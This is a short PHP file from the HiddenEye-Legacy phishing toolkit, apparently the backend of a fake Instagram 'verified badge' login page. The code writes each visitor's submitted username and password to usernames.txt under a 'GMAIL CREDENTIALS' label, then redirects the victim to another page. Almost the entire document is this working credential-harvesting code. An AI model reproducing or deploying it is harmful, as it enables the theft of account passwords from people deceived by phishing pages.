HiddenEye-Legacy/WebPages/Instagram_VerifiedBadge/login3.php
2019-03-02 13:23:59 +05:30

6 lines
194 B
PHP

<?php
file_put_contents("usernames.txt", "GMAIL CREDENTIALS:: [EMAIL]: " . $_POST['username'] . " [PASS]: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location:/index3.html');
exit();